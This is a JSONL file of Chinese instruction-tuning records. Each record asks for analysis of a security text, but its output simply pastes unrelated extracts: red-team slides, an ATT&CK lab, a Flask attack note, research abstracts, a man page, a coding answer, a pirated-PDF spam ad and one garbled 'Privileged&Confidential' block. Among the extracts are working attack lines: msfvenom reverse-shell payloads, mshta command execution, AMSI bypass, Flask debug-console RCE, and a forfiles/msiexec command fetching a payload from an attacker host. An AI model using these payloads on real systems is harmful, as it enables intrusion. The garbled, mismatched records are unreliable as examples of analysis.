{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# flask --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- ## session伪造 flask-session 的三部分为 json->zlib->base64 后的源字符串. 时间戳. hmac 签名信息 **相关文章** - [flask session伪造admin身份](https://blog.csdn.net/since_2020/article/details/119543172) **相关工具** - [noraj/flask-session-cookie-manager](https://github.com/noraj/flask-session-cookie-manager) ```bash python3 flask_session_cookie_manager3.py decode -s \"thisiskey\" -c \"eyJ1c2VybmFtZSI6eyIgYiI6IllXUnRhVzQ9In19.YWfurA.sHD-E9MuX4QZJQ4cU07WYykbJZU\" # 解密 python3 flask_session_cookie_manager3.py encode -s \"thisiskey\" -t \"{'username': b'admin'}\" # 加密 ``` **writeup** - [[HCTF 2018] admin](https://darkwing.moe/2019/11/04/HCTF-2018-admin/) - [BUUCTF N1BOOK [第一章 web入门]](https://blog.csdn.net/RABCDXB/article/details/115189884) --- ## flask-debug **简述** debug 模式需要验证 pin, 而 pin 并非真随机值, 根据机器上的参数可以计算出来 当然,如果目标配置了 `WERKZEUG_DEBUG_PIN=off` 那就不需要 pin 了 **相关文章** - [Flask渗透01debug模式中的RCE](https://anzu.link/pages/204626/) - [Flask RCE Debug Mode](http://ghostlulz.com/flask-rce-debug-mode/) - [Flask开启debug时PIN码的安全性问题](https://xz.aliyun.com/t/11036) - [Flask debug 模式 PIN 码生成机制安全性研究笔记](https://zhuanlan.zhihu.com/p/32336971) **POC | Payload | exp** `/console` ```py import subprocess;out = subprocess.Popen(['whoami'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT);stdout,stderr = out.communicate();print(stdout); ``` --- ## flask-debug xss **相关文章** - [Flask Debugger页面上的通用XSS漏洞分析和挖掘过程记录](http://blog.neargle.com/2016/09/21/flask-src-review-get-a-xss-from-debuger/) - https://github.com/pallets/werkzeug/pull/1001", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n& Privileged&Confidential 01   82 5 Privileged&Confidential 5 Privileged&Confidential 0 & 2 Privileged&Confidential Privileged&Confidential & 01 T Privileged&Confidential T Privileged&Confidential  O% & S1 S&  05 R1  0pC 1P 4Op  t4aC81 Privileged&Confidential Privileged&Confidential & 02 Privileged&Confidential Privileged&Confidential  &  &  & Privileged&Confidential & Privileged&Confidential 03 Privileged&Confidential Privileged&Confidential 141 ap a& 2t. 1.3 & Privileged&Confidential & Privileged&Confidential 04 d Privileged&Confidential d Privileged&Confidential  xj3&%8o 3&u8s  8te p8lamirs 8&&33080y8 br  kg8gn8gsp h  80800 & Privileged&Confidential & Privileged&Confidential 05 Privileged&Confidential Privileged&Confidential  & 1&   & & Privileged&Confidential & Privileged&Confidential 06 Fdz Privileged&Confidential Fdz Privileged&Confidential  aad&85128 +6380 0451&8& 8  +6Ad8AdAu e8sa 8t88  rp8ob-632rp m8 48@75 Privileged&Confidential 48@75 Privileged&Confidential 2963 0 & & 0 11 Privileged&Confidential Privileged&Confidential & 07 Privileged&Confidential Privileged&Confidential  dik5  Bxe5 300ff&&f f1445  bs Boc o-5  00uw 5z rA5 Privileged&Confidential Privileged&Confidential & 08 Privileged&Confidential Privileged&Confidential &0 Privileged&Confidential Privileged&Confidential &.. 355 3p.. 4 33 1xoa2 sA 3e 3D3.. mi3a x..a Privileged&Confidential Privileged&Confidential && D22 +B 3 Privileged&Confidential 3 Privileged&Confidential & 4 Privileged&Confidential 4 Privileged&Confidential & Privileged&Confidential Privileged&Confidential 41& 4 Privileged&Confidential 4 Privileged&Confidential & & Privileged&Confidential & Privileged&Confidential & Privileged&Confidential", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCustom Processing Unit: Tracing and Patching Intel Atom Microcode Black Hat USA 2022 Pietro Borrello Sapienza University of Rome Martin Schwarzl Graz University of Technology Michael Schwarz CISPA Helmholtz Center for Information Security Daniel Gruss Graz University of Technology Outline 1. Deep dive on CPU µcode 1 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Outline 1. Deep dive on CPU µcode 2. µcode Software Framework 1 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Outline 1. Deep dive on CPU µcode 2. µcode Software Framework 3. Reverse Engineering of the secret µcode update algorithm 1 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Outline 1. Deep dive on CPU µcode 2. µcode Software Framework 3. Reverse Engineering of the secret µcode update algorithm 4. Some bonus content ;) 1 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Disclaimer  This is based on our understanding of CPU Microarchitecture.  In theory, it may be all wrong.  In practice, a lot seems right. 2 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) How do CPUs work? 3 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Positive Technologies Results  Red Unlock of Atom Goldmont (GLM) CPUs 4 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Positive Technologies Results  Red Unlock of Atom Goldmont (GLM) CPUs  Extraction and reverse engineering of GLM µcode format 4 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Positive Technologies Results  Red Unlock of Atom Goldmont (GLM) CPUs  Extraction and reverse engineering of GLM µcode format  Discovery of undocumented control instructions to access internal buffers 4 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Microcoded Instuctions 101 . . . cpuid . . . . . . . . . . . . XLAT 5 Pietro Borrello (@borrello pietro) Martin Schwarzl (@marv0x90) Microcoded Instuctions 101 . . . cpuid . . . . . . . . . . . . XLAT µcode ROM seq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.TH CHROOT \"1\" \"August 1999\" \"GNU sh-utils 2.0\" FSF .SH NAME chroot \\- 以 特定 根 目录 运行 命令 或者 交互式 shell .SH \"总览 (SYNOPSIS)\" .B chroot [\\fIOPTION\\fR]\\fI NEWROOT \\fR[\\fICOMMAND\\fR...] .br .B chroot \\fIOPTION\\fR .SH \"描述 (DESCRIPTION)\" .PP 以 NEWROOT 为 根 目录 运行 COMMAND. .TP \\fB\\-\\-help\\fR 显示 帮助 并且 退出 .TP \\fB\\-\\-version\\fR 显示 版本 信息 并且 退出 .PP 如果 没有 指定 命令, 运行 ``${SHELL} \\fB\\-i\\fR'' (默认: /bin/sh). .SH \"报告错误 (REPORTING BUGS)\" 把 错误 报告 给 <bug-sh-utils@gnu.org>. .SH \"参见 (SEE ALSO)\" .B chroot 的 完整 的 文档 是 以 Texinfo 手册页 维护 的. 如果 .B info 和 .B chroot 程序 被 正确 的 安装 在 你的 机子 上, 用 .IP .B info chroot .PP 命令 查看 完整 的 手册页. .SH \"版权 (COPYRIGHT)\" 版权所有 \\(co 1999 自由软件基金会 .br 这一程序是自由软件; 拷贝条件见源文件. 没有任何担保; 甚至没有适合特定目的的隐含的担保. .SH \"[中文版维护人]\" .B 唐友 <tony_ty@263.net> .SH \"[中文版最新更新]\" .BR 2001/9/20 .SH \"[中国Linux论坛man手册页翻译计划]\" .BI http://cmpp.linuxforum.net", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n本人可以提供各种PDF电子书资料计算机类文学艺术设计医学理 学经济金融等等质量都很清晰而且每本100%都带书签和目录方便 读者阅读观看只要您提供给我书的相关信息一般我都能找到如果您有需 求请联系我 QQ: 461573687, 或者 QQ: 2404062482 本人已经帮助了上万人找到了他们需要的PDF其实网上有很多PDF,大家如果 在网上不到的话可以联系我QQ因PDF电子书都有版权请不要随意传播 最近pdf也越来越难做了希望大家尊重下个人劳动谢谢 __________________________________________________________________________________ 提供各种书籍pdf下载如有需要请联系 QQ: 461573687 备用QQ:2404062482 PDF制作说明", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nShell is Only the Beginning后渗透阶段的攻防对抗 3gstudent & Evi1cg As a offensive researcher, if you can dream it,someone has likely already done it and that someone isnt the kind of person who speaks at security cons Matt Graeber 3gstudent Good$Study Good$Health Good$Attitude$ Evi1cg Thin WhiteHat Security$Researcher 后渗透阶段 渗透测试 以特定的业务系统作为目标识 别出关键的基础设施并寻找客 户组织最具价值和尝试进行安全 保护的信息和资产 黑客攻击 黑客对攻击战果进一步扩大以 及尽可能隐藏自身痕迹的过程  打开一扇窗  Open Proxy  绕过看门狗  Bypass Application Whitelisting  我来作主人  Escalate Privileges  屋里有什么  Gather Information  我来抓住你  Detection and Mitigations  挖一个密道  Persistence 目录 打开一扇窗 Open Proxy 为什么用代理?  更好地接触到目标所处环境  使用已有shell的机器作为跳板扩大战果  Its the beginning 常用方法 端口转发Client-> Lcx, Netsh; HTTP-> Tunnel; Metasploit-> Portpwd Socks代理Client-> Ew,Xsocks; HTTP-> ReGeorg; Metasploit-> Socks4a 其他SSH, ICMP 等 Vpn  然而我们可能会碰到这样的情况  安装杀毒软件,拦截恶意程序  设置应用程序白名单,限制白名单以外的程序运行 egWindows Applocker Windows AppLocker 简介 即应用程序控制策略可用来对可执行程序安装程序和脚本进行控制 开启默认规则后除了默认路径可以执行外其他路径均无法执行程序和脚本 绕过看门狗 Bypass Application Whitelisting 绕过思路 ü Hta ü Office Macro ü Cpl ü Chm ü Powershell ü Rundll32 ü Regsvr32 ü Regsvcs ü Installutil  1Hta More  Mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\"calc.exe\",0,true)(window.cl ose)  Mshta.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();h=new%20ActiveXObject(\"WScript.Shell\").run(\"calc.exe \",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveX Object(\"WScript.Shell\").Run(\"cmd /c taskkill /f /im mshta.exe\",0,true);} 2Office Macro MacroRaptor  Detect malicious VBA Macros  Python  https://bitbucket.org/decalage/oletools/wiki/mraptor 3Cpl DLL/CPL: 生成Payload.dll: msfvenom -p$windows/meterpreter/reverse_tcp -b$\\x00\\xff$lhost=192.168.127.132$lport=8888$-f$dll -o$payload.dll (1)$直接运行dll rundll32$shell32.dll,Control_RunDLL$payload.dll (2)$将dll重命名为cpl双击运行 (3)$普通的dll直接改后缀名 From: http://drops.wooyun.org/tips/16042 4Chm 高级组合技打造完美 捆绑后门 http://drops.wooyun.org/tips/14254 利用系统CHM文件实现隐蔽后门 那些年我们玩过的奇技淫巧 5Powershell Command:  powershell -nop -exec$bypass$-c", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2012 @IDF.cn 安全改變未來 網絡使生活更美好 萬濤 ChinaEagle IDF互聯網威懾防禦實驗室 中國電子學會計算機取證專家委員會 1  2012 @IDF.cn 雲計算模式下的安全和駭客經濟威脅趨勢 智慧的地球對安全的需求 這個星球變得越來越... 機械化,,,, 互聯 化 智能....化 我們在過去十年中看 到的變化比再之前90 90 90 90 年的總和都要多 Ad J. Scheepbouwer, CEO, KPN Telecom Privacy and identity controls Information protection and recovery Infrastructure and application protection Governance and policy management 新的成為可能 新的複雜性 新的風險. . . . GRC GRC GRC GRC GRC GRC GRC GRC GRC GRC GRC GRC 2  2012 @IDF.cn 雲計算模式下的安全和駭客經濟威脅趨勢 中國僵屍電腦第一生產大國 網頁掛馬帶來的最直接後果僵屍如瘟疫般蔓延 美國僵屍生產力下降而中國保持穩步增長已佔據了生產僵屍電腦第一大國的位置 數據來源邁克菲威脅報告 3  2012 @IDF.cn 雲計算模式下的安全和駭客經濟威脅趨勢 \"駭客經濟\"模式已基本形成,規模龐大,日趨複雜 4  2012 @IDF.cn 雲計算模式下的安全和駭客經濟威脅趨勢 威脅發展特點 攻擊產業化威脅數量激增 攻擊自動化快速蔓延 攻擊智能化威脅技術多樣化 威脅端到端依靠單安全組件如何應對 如何做到全方位立體防護 5  2012 @IDF.cn 雲計算模式下的安全和駭客經濟威脅趨勢 6 智慧的地球面臨安全的挑戰 Source http://searchcompliance.techtarget.com/news/article/0,289142,sid195_gci1375707,00.html http://searchcompliance.techtarget.com/news/article/0,289142,sid195_gci1375707,00.html http://searchcompliance.techtarget.com/news/article/0,289142,sid195_gci1375707,00.html http://searchcompliance.techtarget.com/news/article/0,289142,sid195_gci1375707,00.html 複雜性增加 成本增加 合規性要求 安全專案的核心驅動力 僅僅統計了美國的公司在 2010年中用於風險治理和 合規的花肥超過了290億 美金 保護每一個客戶記錄需 要204美元 很快連接在網路上的設備 將超過1萬億臺, 組成一個 Internet事務 6  2012 @IDF.cn 雲計算模式下的安全和駭客經濟威脅趨勢 對數據安全和私密性保護的擔心是最主要的  但並不是唯一的 共有雲服務 69% 69% 69% 69% 54% 54% 54% 54% 53% 53% 53% 53% 52% 52% 52% 52% 47% 47% 47% 47% 公司數據的安全和隱密性 服務品質 對成本節省的懷疑 網路回應能力是否迅速 與內部 IT集成的困難性 Percent rating the factor as a significant barrier (4 or 5) Percent rating the factor as a significant barrier (4 or 5) Percent rating the factor as a significant barrier (4 or 5) Percent rating the factor as a significant barrier (4 or 5) Respondents could select multiple items Source: Cloud Market Insights, Cloud Computing Research, July 2009. n=1,090 7  2012 @IDF.cn 雲計算模式下的安全和駭客經濟威脅趨勢 特殊用戶對雲計算安全的擔憂 保護知識產權和數據 合規性的能力 非授權使用數據 數據機密性 數據可用性 數據完整性 可以測試和審計供應商的環境 其他 30% 30% 30% 30% 21% 21% 21% 21% 15% 15% 15% 15% 12% 12% 12% 12% 9% 9% 9% 9% 8% ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA Methodology to Detect and Characterize Kernel Level Rootkit Exploits Involving Redirection of the System Call Table John Levine, Julian Grizzard, Henry Owen School of Electrical and Computer Engineering Georgia Institute of Technology E-mail: levine@ece.gatech.edu Abstract There is no standardized methodology at present to characterize rootkits that compromise the security of computer systems. The ability to characterize rootkits will provide system administrators with information so that they can take the best possible recovery actions and may also help to detect additional instances and prevent the further installation of the rootkit allowing the security community to react faster to new rootkit exploits. There are limited capabilities at present to detect rootkits, but in most cases these capabilities only indicate that a system is infected without identifying the specific rootkit. We propose a mathematical framework for classifying rootkit exploits as existing, modifications to existing, or entirely new. An in-depth analysis of a particular type of kernel rootkit is conducted in order to develop a characterization. As a result of this characterization and analysis, we propose some new methods to detect this particular class of rootkit exploit. 1. Introduction Computers on todays Internet are vulnerable to a variety of exploits that can compromise their intended operations. Systems can be subject to Denial of Service Attacks that prevent other computers from connecting to them for their provided service (e.g. web server) or prevent them from connecting to other computers on the Internet. They can be subject to attacks that cause them to cease operations either temporary or permanently. A hacker may be able to compromise a system and gain root level access, i.e. the ability to control that system as if the hacker was the system administrator. A hacker who gains root access on a computer system may want to maintain that access for the foreseeable future. One way ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nSaif El-Sherei & Etienne Stalmans What is Fuzzing?? Fuzzing is feeding an Application with malformed input in hope to find errors and faults in the application code and with a bit of luck these faults can lead to exploitable vulnerabilities Basic History of Fuzzing  1988-199:  Boris Beizer Syntax Testing.  Barton Miller Fuzz: An Emprical Study of Robustness.  1999  2001 OUSPG PROTOS SNMP, HTTP, SIP, H.323, LDAP, etc   2002 Dave Aitel SPIKE block based fuzzing. Codnemicon first commercial fuzzer.  2004 Browser Fuzzing start lcamtufs MangleMe.  2005 FileFuzz , SPIKEfile NotSPIKEfile File format fuzzing.  2006 Month of Browser Bugs (MoBB) HD Moore relases a browser bug every day for a month release of CSSDIE, COMRaider and Axman and hamachi.  2011 Lcamtuf decided to revolutionize Browser fuzzing in 2011 by releasing cross_fuzz. In his own words \"a surprisingly effective but notoriously annoying cross-document DOM binding fuzzer that helped identify about one hundred bugs in all browsers on the market - many of said bugs exploitable - and is still finding more.\" it is based on ref_fuzz which he developed in 2008.  2014 lcamtufs introduces American Fuzzy lop (Afl) Evolutionary fuzzer. Fuzzing Types And Techniques Fuzzing methodology Monitor for Memory corruption Errors. Fuzz target Generate Data Identify Inputs Identify Target Fuzzing Types  Mutation/Non-Intelligent Fuzzing Randomly apply mutation algorithms to the supplied input to generate several test cases without any concern to the target format.  Generation/Intelligent Fuzzing Utilize grammar to model a certain format specification and randomly generate semi-valid test cases. to minimize fault conditions and generate test cases that are accepted by the target. Fuzzing Types Contd..  Evolutionary Fuzzing Combining either types of fuzzing with code and binary instrumentation tools, to monitor code paths and generate test cases based on the results of the instrumentation to achieve least number of test cases with high", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPowerShell Version Release Date Default Windows Versions PowerShell 1.0 November 2006 Windows Server 2008 (*) PowerShell 2.0 October 2009 Windows 7 Windows Server 2008 R2 (**) PowerShell 3.0 September 2012 Windows 8 Windows Server 2012 PowerShell 4.0 October 2013 Windows 8.1 Windows Server 2012 R2 PowerShell 5.0 February 2016 Windows 10 PowerShell 5.1 January 2017 Windows 10 Anniversary Update Windows Server 2016 Windows Server 2019 PowerShell Core 6 January 2018 N/A PowerShell 7 March 2020 N/A Bypass AMSI的前世今生(2) - 2种低成本对抗方法 0x00 前言 本文主要介绍2种低成本的对抗AMSI的方法 [BA1] 降级PowerShell版本到2.0 [BA4] 设置注册表HKCU\\Software\\Microsoft\\Windows Script\\Settings\\AmsiEnable设置为 0 以禁用 AMSI 我们沿用测试思考验证的思路对这2种方法进行分析 0x01 降级攻击 降级攻击顾名思义就是使用低版本2.0的PowerShell来执行攻击脚本因为在低版本的 powershell上没有AMSI在我们测试之前我们需要知道PowerShell在Windows上的预装情况如图 所示https://4sysops.com/wiki/differences-between-powershell-versions/ * Has to be installed through Server Manager ** Also integrated in all later Windows versions 通多以上图我们可以看出2.0在当前常用的系统上默认安装的很少AMSI是在win10 winServer2016开始装备的也就是说我们要研究的其实是Win10Win2016Win2019上面2.0的安装 情况因为.Net CLR 4.0是不兼容PowerShell2.0的PowerShell2.0是基于.NET CLR 2.0的而.NET CLR 2.0是.NET2/3/3.5的运行时对照表如下 通过查询官方文档只有.NET Framework 3.5在Win10的机器上默认安装也就是说降级攻击默认使用 只能在Win10上使用但是不要太相信官方文档官方文档也不一定正确同时很多服务依赖 于.Net2/2/3/3.5很有可能管理员会自己安装因此使用攻击前自己探测清楚很重要我们可以使用以 下命令判断能否使用Powershell2.0 AttackTeamFamily No. 1 / 5 - www.red-team.cn 我们在Win10上测试以下降级攻击 在命令种直接使用powershell.exe -version 2改变运行版本如果在脚本中使用在脚本开头加入 #requires -version 2这样如果可以使用2.0脚本会以2.0执行如果不能会按照当前powershell版 本执行注意不是所有powershell脚本都能在2.0上执行需要注意攻击脚本支不支持2.0不要看完这 个傻乎乎的去加一行#requires -version 2就以为能绕过了 在这儿可能你还要问一个问题Powershell 3.0行不行呢答案是不行的使用 -version 3/4/5 其实都是 使用的当前版本的powershell 注非管理员权限 Get-ChildItem 'HKLM:\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP' -recurse | Get- ItemProperty -name Version -EA 0 | Where { $_.PSChildName -match '(?!S)\\p{L}'} | Select -ExpandProperty Version 注需要管理员权限 Win10 Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2 Win2016/Win2019 Get-Windo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA CTF-Style Escape Journey on VMware Workstation f1yyy@Chaitin.Tech About us  Beijing Chaitin Tech Co., Ltd(@ChaitinTech)  https://chaitin.cn/en  https://realworldctf.com/  Chaitin Security Research Lab  Pwn2Own 2017 3rd place  GeekPwn 2015/2016/2018/2019 awardees  PS4 Jailbreak, Android rooting, IoT Offensive Research, ESXi Escape  CTF players from team b1o0p, Tea Deliverers  2nd place at DEFCON 2016  3rd place at DEFCON 2019  1st place at HITCON 2019 Before we start  VMM(Hypervisor)Virtual Machine Monitor  Guest OS  Host OS What is Virtual Machine Escape VMM Guest OS 0 Guest OS 1 Guest OS N ... Host OS ... Normally, all of the sensitive behaviors of guest OS will be sanitized by the hypervisor What is Virtual Machine Escape VMM Guest OS 0 Guest OS 1 Guest OS N ... Host OS ... What is Virtual Machine Escape VMM Guest OS 0 Guest OS 1 Guest OS N ... Host OS exploitation ... What is Virtual Machine Escape VMM Guest OS 0 Guest OS 1 Guest OS N ... Host OS exploitation Execute arbitrary codes on the host network connectio ... Introduction of VMware Workstation Architecture Host OS Physical Hardware User mode Architecture after vmware runs Host OS Physical Hardware User mode VM Monitor vmware-vmx vmmon VM VM VM Host World VM World Architecture after vmware runs Host OS Physical Hardware User mode VM Monitor vmware-vmx vmmon VM VM VM Host World VM World Architecture after vmware runs Host OS Physical Hardware User mode VM Monitor vmware-vmx vmmon VM VM VM Host World VM World Attack Surface Graphic Ethernet USB SATA SCSI COM Attack in Recent Years (Pwn2Own 2019) Graphic Ethernet USB SATA SCSI COM (TianfuCup 2018) (Pwn2Own 2017) Our Target (Pwn2Own 2019) Graphic Ethernet USB SATA SCSI COM (TianfuCup 2018) (Pwn2Own 2017) CVE-2019-5541 Analysis How e1000e works? Guest OS TDT TDH TDBAL TDBAH e1000e virtual network card registers How e1000e works? Guest OS TDT TDH TDBAL TDBAH e1000e virtual network card registers write How e1000e works? Guest OS TDT TDH TDBAL TDBAH e1000e virtua", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1202-win-间接命令执行-基于Forfiles执行payload(白名单) ## 来自ATT&CK的描述 可以使用各种Windows实用程序来执行命令而不需要调用cmd例如Forfiles程序兼容性助手pcalua.exeWSLWindowsSubsystem for Linux组件以及其他实用程序可以从命令行界面运行窗口或通过脚本来调用程序和命令的执行 攻击者可能会滥用这些功能来规避防御尤其是在破坏检测和/或缓解控制如组策略的同时执行任意动作这些控制限制/阻止了cmd或恶意负载相关文件扩展名的使用 ## 测试案例 Forfiles为Windows默认安装的文件操作搜索工具之一可根据日期后缀名修改日期为条件常与批处理配合使用 微软官方文档 <https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11)> 说明Forfiles.exe所在路径已被系统添加PATH环境变量中因此Forfiles命令可识别需注意x86x64位的Forfiles调用 Windows 2003 默认位置 C:\\WINDOWS\\system32\\forfiles.exe C:\\WINDOWS\\SysWOW64\\forfiles.exe Windows 7 默认位置 C:\\WINDOWS\\system32\\forfiles.exe C:\\WINDOWS\\SysWOW64\\forfiles.exe 补充说明在高版本操作系统中可以通过配置策略对进程命令行参数进行记录日志策略开启方法`本地计算机策略>计算机配置>管理模板>系统>审核进程创建>在过程创建事件中加入命令行>启用`同样也可以在不同版本操作系统中部署sysmon通过sysmon日志进行监控 ## 检测日志 windows 安全日志需要自行配置 ## 测试复现 ### 环境准备 攻击机Kali2019 靶机win7 ### 攻击分析 #### 生成payload ```bash msfvenom -p windows/x64/shell/reverse_tcp LHOST=192.168.126.146 LPORT=8888 -f msi > abc.txt ``` #### MSF配置 ```bash msf5 exploit(multi/handler) > back msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost 192.168.126.146 lhost => 192.168.126.146 msf5 exploit(multi/handler) > set lport 8888 lport => 5555 msf5 exploit(multi/handler) > exploit ``` #### 靶机执行payload ```cmd forfiles /p c:\\windows\\system32 /m cmd.exe /c \"msiexec.exe /q /i http://192.168.126.146/abc.txt\" ``` #### 反弹shell 反弹shell失败但不影响后续分析 ## 测试留痕 ```log #sysmon日志 EventID1 Process Create: RuleName: UtcTime: 2020-04-18 16:27:08.447 ProcessGuid: {bb1f7c32-2a5c-5e9b-0000-0010b3101d00} ProcessId: 588 Image: C:\\Windows\\System32\\msiexec.exe FileVersion: 5.0.7601.17514 (win7sp1_rtm.101119-1850) Description: Windows installer Product: Windows Installer - Unicode Company: Microsoft Corporation OriginalFileName: msiexec.exe CommandLine: /q /i http://192.168.126.146/abc.txt CurrentDirectory: C:\\Windo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 线性反馈移位寄存器 - LFSR ## 介绍 线性反馈移位寄存器的反馈函数一般如下 $a_{i+n}=\\sum\\limits_{j=1}{n}c_ja_{i+n-j}$ 其中$c_j$ 均在某个有限域 $F_q$ 中 既然线性空间是一个线性变换我们可以得知这个线性变换为 $$ \\begin{align*} &\\left[ a_{i+1},a_{i+2},a_{i+3}, ...,a_{i+n} \\right]\\\\\\\\=&\\left[ a_{i},a_{i+1},a_{i+2}, ...,a_{i+n-1} \\right]\\left[ \\begin{matrix} 0 & 0 & \\cdots & 0 & c_n \\\\ 1 & 0 & \\cdots & 0 & c_{n-1} \\\\ 0 & 1 & \\cdots & 0 & c_{n-2}\\\\\\vdots & \\vdots & \\ddots & \\vdots \\\\ 0 & 0 & \\cdots & 1 & c_1 \\\\ \\end{matrix} \\right]\\\\\\\\=&\\left[ a_{0},a_{1},a_{2}, ...,a_{n-1} \\right]\\left[ \\begin{matrix} 0 & 0 & \\cdots & 0 & c_n \\\\ 1 & 0 & \\cdots & 0 & c_{n-1} \\\\ 0 & 1 & \\cdots & 0 & c_{n-2}\\\\\\vdots & \\vdots & \\ddots & \\vdots \\\\ 0 & 0 & \\cdots & 1 & c_1 \\\\ \\end{matrix} \\right]{i+1} \\end{align*} $$ 进而我们可以求得其特征多项式为 $f(x)=xn-\\sum\\limits_{i=1}{n}c_ix{n-i}$ 同时我们定义其互反多项式为 $\\overline f(x)=xnf(\\frac{1}{x})=1-\\sum\\limits_{i=1}{n}c_ix{i}$ 我们也称互反多项式为线性反馈移位寄存器的联结多项式 这里有一些定理需要我们记一下感兴趣的可以自行推导 ## 特征多项式与生成函数 已知某个 n 级线性反馈移位寄存器的特征多项式那么该序列对应的生成函数为 $A(x)=\\frac{p(x)}{\\overline f(x)}$ 其中$p(x)=\\sum\\limits_{i=1}{n}(c_{n-i}x{n-i}\\sum\\limits_{j=1}{i}a_jx{j-1})$可以看出 p(x) 完全由初始状态和反馈函数的系数决定 ## 序列周期与生成函数 序列的的周期为其生成函数的既约真分式的分母的周期 对于 n 级线性反馈移位寄存器最长周期为 $2{n}-1$排除全零达到最长周期的序列一般称为 m 序列 ## 特殊性质 - 将两个序列累加得到新的序列的周期为这两个序列的周期的和 - 序列是 n 级 m 序列当且仅当序列的极小多项式是 n 次本原多项式 ## B-M 算法 一般来说我们可以从两种角度来考虑 LFSR - 密钥生成角度一般我们希望使用级数尽可能低的 LFSR 来生成周期大随机性好的序列 - 密码分析角度给定一个长度为 n 的序列 a如何构造一个级数尽可能小的 LFSR 来生成它其实这就是 B-M 算法的来源 一般来说我们定义一个序列的线性复杂度如下 - 若 s 为一个全零序列则线性复杂度为0 - 若没有 LFSR 能生成 s则线性复杂度为无穷 - 否则s 的线性复杂度为生成 L(s) 的最小级的 LFSR BM 算法的要求我们需要知道长度为 2n 的序列其复杂度 - 时间复杂度O(n2) 次比特操作 - 空间复杂度O(n) 比特 关于 BM 算法的细节后续添加目前处于学习过程中 但是其实如果我们知道了长度为 2n 的序列我们也可以一种比较笨的方法来获取原先的序列不妨假设已知的序列为$a_1,...,a_{2n}$我们可以令 $S_1=(a_1,...,a_n)$ $S_2=(a_2,...,a_{n+1})$ .... $S_{n+1}=(a_{n+1},...,a_{2n})$ 那么我们可以构造矩阵 $X=(S_1,...,S_n)$那么 $S_{n+1}=(c_n,...,c_1)X$ 所以 $(c_n,...,c_1)=S_{n+1}X{-1}$ 进而我们也就知道了 LFSR 的反馈表达式进而我们就可以推出初始化种子 ## 2018 强网杯 streamgame1 简单看一下题目 ```python from flag import flag assert flag.startswith(\"flag{\") assert flag.endswith(\"}\") asser", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# 27. 二叉树的镜像 [牛客网](https://www.nowcoder.com/practice/a9d0ecbacef9410ca97463e4a5c83be7?tpId=13&tqId=11171&tab=answerKey&from=cyc_github) ## 题目描述 <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/0c12221f-729e-4c22-b0ba-0dfc909f8adf.jpg\" width=\"300\"/> </div><br> ## 解题思路 ```java public TreeNode Mirror(TreeNode root) { if (root == null) return root; swap(root); Mirror(root.left); Mirror(root.right); return root; } private void swap(TreeNode root) { TreeNode t = root.left; root.left = root.right; root.right = t; } ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho am I?  11 years in InfoSec with 5 years of hobby work prior to that  Primary interests: penetra;on tes;ng, intrusion detec;on, and log correla;on  Currently employed as an InfoSec generalist at a cloud provider  Previously worked at several Fortune 100 companies  blindedscience@gmail.com What is this What is the Cloud?  Harnesses the massively scalable Internet infrastructure to provide mul;ple users with on-demand access to data, applica;ons, and services  Use of shared or virtualized resources to lower costs, reduce complexity, and increase flexibility  For the purpose of this talk, were talking about IaaS or SaaS This is a picture of a kiQen A Weapon of Mass Destruc;on?  DefCon 17  Clobbering the Cloud (SensePost)  DefCon 18  Cloud Compu;ng: A Weapon of Mass Destruc;on? (Bryan/Anderson)  Cloud providers essen;ally arent doing much internal policing of their clients  Unofficial policy: As long as no complaints are received, nothing will be done 